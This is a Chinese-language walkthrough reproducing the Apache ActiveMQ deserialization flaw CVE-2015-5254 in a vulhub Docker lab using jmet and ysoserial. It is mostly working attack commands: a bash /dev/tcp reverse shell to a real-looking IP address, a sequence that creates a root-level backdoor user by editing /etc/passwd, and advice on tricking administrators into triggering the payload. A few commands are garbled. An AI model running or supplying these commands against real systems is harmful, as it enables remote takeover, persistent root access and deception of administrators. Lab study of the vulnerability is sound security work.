ActiveMQ反序列化漏洞(CVE-2015-5254)復現
0x00 漏洞前言
Apache ActiveMQ是美國阿帕奇(Apache)軟體基金會所研發的一套開源的訊息中介軟體,它支援Java訊息服務,叢集,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,該漏洞源於程式沒有限制可在代理中序列化的類。遠端攻擊者可藉助特製的序列化的Java訊息服務(JMS)ObjectMessage物件利用該漏洞執行任意程式碼。
0x01 漏洞環境
1.在ubuntu16.04下安裝docker/docker-compose:
# 安裝pip curl-s https://bootstrap.pypa.io/get-pip.py | python3 # 安裝最新版docker curl -s https://get.docker.com/ | sh # 啟動docker服務 service docker start # 安裝compose pip install docker-compose # 下載專案 wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip unzip vulhub-master.zip cd vulhub-master # 進入某一個漏洞/環境的目錄 cd activemq/CVE-2015-5254/ # 自動化編譯環境 docker-compose build
2.執行漏洞環境:
docker-compose up -d
環境執行後,將監聽61616和8161兩個埠其中61616是工作埠,訊息在這個埠進行傳遞; 8161是網路管理頁面埠訪問http://your-ip:8161即可看到網路管理頁面,不過這個漏洞理論上是不需要網路的。
使用瀏覽器直接訪問activemq,檢視是否部署完畢
http://45.32.101.90:8161/admin/(預設的使用者名稱/密碼為admin/admin)
0x02 漏洞復現
1.漏洞利用過程如下:
a.構造(可以使用ysoserial)可執行命令的序列化物件
b.作為一個訊息,傳送給目標61616埠
c.訪問的Web管理頁面,讀取訊息,觸發漏洞
2.使用jmet進行漏洞利用:
首先下載jmet的jar檔案,並在同目錄下建立一個external資料夾(否則可能會爆資料夾不存在的錯誤)。jmet原理是使用ysoserial生成Payload併發送(其jar內自帶ysoserial,無需再自己下載),所以我們需要在ysoserial是gadget中選擇一個可以使用的,比如ROME。
cd /opt wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar mkdir external
3.執行命令
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME 45.32.101.90 61616
4.此時會給目標的ActiveMQ新增一個名為事件的佇列,可以我們通過http://45.32.101.90:8161/admin/browse.jsp?JMSDestination=event看到這個佇列中所有訊息:
5.點選檢視這條訊息即可觸發命令執行
6.此時進入容器
docker exec -it cc0e9385f975 /bin/bash
7.可看到/ tmp /已成功建立,說明漏洞利用成功:
8.反彈shell:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -i >& /dev/tcp/45.32.101.90/12340>&1" -Yp ROME45.32.101.90 61616
遠端主機監聽1234埠:
nc -lvvp 1234
即可看到反彈是shell:
值得注意的是,通過網路管理頁面訪問訊息並觸發漏洞這個過程需要管理員許可權。在沒有密碼的情況下,我們可以誘導管理員訪問我們的連結以觸發,或者偽裝成其他合法服務需要的訊息,等待客戶端訪問的時候觸發。
9.新增使用者
執行jmet的命令新增test使用者並將其新增到root組,返回http://192.168.221.185:8161/admin/browse.jsp?JMSDestination=event頁面,點選一下訊息,觸發它:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "useradd -g root -s /bin/bash -u 10010 test" -Yp ROME 45.32.101.90 61616
讓我們再將passwd中的test的uid修改為0,使它擁有root許可權,返回http://192.168.221.185:8161/admin/browse.jsp?JMSDestination=event頁面,點選一下訊息,觸發它。
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "sed -i "s/test:x:10010/test:x:0/g" /etc/passwd" -Yp ROME 45.32.101.90 61616
讓我們再為test使用者設定一個密碼,返回http://192.168.221.185:8161/admin/browse.jsp?JMSDestination=event頁面,點選一下訊息,觸發它。
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "echo "test:sd123456" | chpasswd" -Yp ROME 45.32.101.90 61616
到此為止,一個許可權為root,密碼為123456的使用者即建立完畢。我們可以使用ssh直接遠端登陸進入作業系統,並且還是最高許可權。
0x03 參考連結